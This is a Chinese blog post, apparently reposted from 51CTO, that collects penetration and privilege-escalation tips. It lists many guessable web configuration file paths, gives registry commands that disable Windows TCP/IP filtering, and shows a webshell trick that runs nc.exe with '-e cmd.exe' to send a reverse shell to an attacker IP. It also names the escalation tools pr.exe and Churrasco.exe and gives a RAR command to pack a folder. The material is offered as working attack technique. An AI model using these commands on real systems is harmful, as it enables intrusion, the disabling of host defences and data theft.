提权、渗透、经验、技巧总结大全四

简介:

各种网站的配置文件相对路径大全:

/config.php
http://www.cnblogs.com/config.php
../config.php
http://www.cnblogs.com/../config.php
/config.inc.php
./config.inc.php
http://www.cnblogs.com/config.inc.php
../config.inc.php
http://www.cnblogs.com/../config.inc.php
/conn.php
./conn.php
http://www.cnblogs.com/conn.php
../conn.php
http://www.cnblogs.com/../conn.php
/conn.asp
./conn.asp
http://www.cnblogs.com/conn.asp
../conn.asp
http://www.cnblogs.com/../conn.asp
/config.inc.php
./config.inc.php
http://www.cnblogs.com/config.inc.php
../config.inc.php
http://www.cnblogs.com/../config.inc.php
/config/config.php
http://www.cnblogs.com/config/config.php
../config/config.php
http://www.cnblogs.com/../config/config.php
/config/config.inc.php
./config/config.inc.php
http://www.cnblogs.com/config/config.inc.php
../config/config.inc.php
http://www.cnblogs.com/../config/config.inc.php
/config/conn.php
./config/conn.php
http://www.cnblogs.com/config/conn.php
../config/conn.php
http://www.cnblogs.com/../config/conn.php
/config/conn.asp
./config/conn.asp
http://www.cnblogs.com/config/conn.asp
../config/conn.asp
http://www.cnblogs.com/../config/conn.asp
/config/config.inc.php
./config/config.inc.php
http://www.cnblogs.com/config/config.inc.php
../config/config.inc.php
http://www.cnblogs.com/../config/config.inc.php
/data/config.php
http://www.cnblogs.com/data/config.php
../data/config.php
http://www.cnblogs.com/../data/config.php
/data/config.inc.php
./data/config.inc.php
http://www.cnblogs.com/data/config.inc.php
../data/config.inc.php
http://www.cnblogs.com/../data/config.inc.php
/data/conn.php
./data/conn.php
http://www.cnblogs.com/data/conn.php
../data/conn.php
http://www.cnblogs.com/../data/conn.php
/data/conn.asp
./data/conn.asp
http://www.cnblogs.com/data/conn.asp
../data/conn.asp
http://www.cnblogs.com/../data/conn.asp
/data/config.inc.php
./data/config.inc.php
http://www.cnblogs.com/data/config.inc.php
../data/config.inc.php
http://www.cnblogs.com/../data/config.inc.php
/include/config.php
http://www.cnblogs.com/include/config.php
../include/config.php
http://www.cnblogs.com/../include/config.php
/include/config.inc.php
./include/config.inc.php
http://www.cnblogs.com/include/config.inc.php
../include/config.inc.php
http://www.cnblogs.com/../include/config.inc.php
/include/conn.php
./include/conn.php
http://www.cnblogs.com/include/conn.php
../include/conn.php
http://www.cnblogs.com/../include/conn.php
/include/conn.asp
./include/conn.asp
http://www.cnblogs.com/include/conn.asp
../include/conn.asp
http://www.cnblogs.com/../include/conn.asp
/include/config.inc.php
./include/config.inc.php
http://www.cnblogs.com/include/config.inc.php
../include/config.inc.php
http://www.cnblogs.com/../include/config.inc.php
/inc/config.php
http://www.cnblogs.com/inc/config.php
../inc/config.php
http://www.cnblogs.com/../inc/config.php
/inc/config.inc.php
./inc/config.inc.php
http://www.cnblogs.com/inc/config.inc.php
../inc/config.inc.php
http://www.cnblogs.com/../inc/config.inc.php
/inc/conn.php
./inc/conn.php
http://www.cnblogs.com/inc/conn.php
../inc/conn.php
http://www.cnblogs.com/../inc/conn.php
/inc/conn.asp
./inc/conn.asp
http://www.cnblogs.com/inc/conn.asp
../inc/conn.asp
http://www.cnblogs.com/../inc/conn.asp
/inc/config.inc.php
./inc/config.inc.php
http://www.cnblogs.com/inc/config.inc.php
../inc/config.inc.php
http://www.cnblogs.com/../inc/config.inc.php
/index.php
./index.php
http://www.cnblogs.com/index.php
../index.php
http://www.cnblogs.com/../index.php
/index.asp
./index.asp
http://www.cnblogs.com/index.asp
../index.asp
http://www.cnblogs.com/../index.asp
 
去除TCP IP筛选:

TCP/IP筛选在注册表里有三处,分别是:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

分别用以下命令来导出注册表项:
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip 
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip 
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

然后再把三个文件里的:

“EnableSecurityFilters"=dword:00000001”

改为:

“EnableSecurityFilters"=dword:00000000”

再将以上三个文件分别用以下命令导入注册表即可:
regedit -s D:\a.reg 
regedit -s D:\b.reg 
regedit -s D:\c.reg 
 
Webshell 提权小技巧:

Cmd路径:c:\windows\temp\cmd.exe

Nc 也在同目录下,例如反弹cmdshell:

"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"

通常都不会成功。

而直接在 cmd 路径上输入:c:\windows\temp\nc.exe

命令输入:-vv ip 999 -e c:\windows\temp\cmd.exe

却能成功。。这个不是重点
我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。
 
命令行调用 RAR 打包:

rar a -k -r -s -m3 c:\1.rar c:\folder
 本文转自gaodi2002 51CTO博客,原文链接:http://blog.51cto.com/gaodi2002/1618133



相关文章
|
2月前
|
安全 应用服务中间件 PHP
黑客渗透知识点总结
黑客渗透知识点总结
|
12月前
|
SQL 开发框架 安全
记一次H站渗透以及提权
这个网站所使用的程序是一套自助交换友情链接的ASP脚本程序 直链王.
|
12月前
|
中间件 关系型数据库 MySQL
高难度渗透测试场景靶场
高难度渗透测试场景靶场
93 0
|
Go 数据安全/隐私保护
某教程学习笔记(一):21、后渗透攻击
某教程学习笔记(一):21、后渗透攻击
95 0
某教程学习笔记(一):21、后渗透攻击
|
SQL 运维 安全
安全渗透环境准备_1 | 学习笔记
快速学习 安全渗透环境准备_1
99 0
|
安全 Ubuntu 关系型数据库
安全渗透环境准备_2 | 学习笔记
快速学习 安全渗透环境准备_2
133 0
|
安全 Shell 应用服务中间件
|
安全 网络协议 Ubuntu
|
安全 Shell PHP
RCE漏洞挖掘经验分享(一)
RCE漏洞挖掘经验分享(一)
644 0
|
SQL 存储 安全
WEB安全Permeate漏洞靶场挖掘实践
最近在逛码云时候发现permeat靶场系统,感觉界面和业务场景设计的还不错.所以过来分享一下.
215 0
WEB安全Permeate漏洞靶场挖掘实践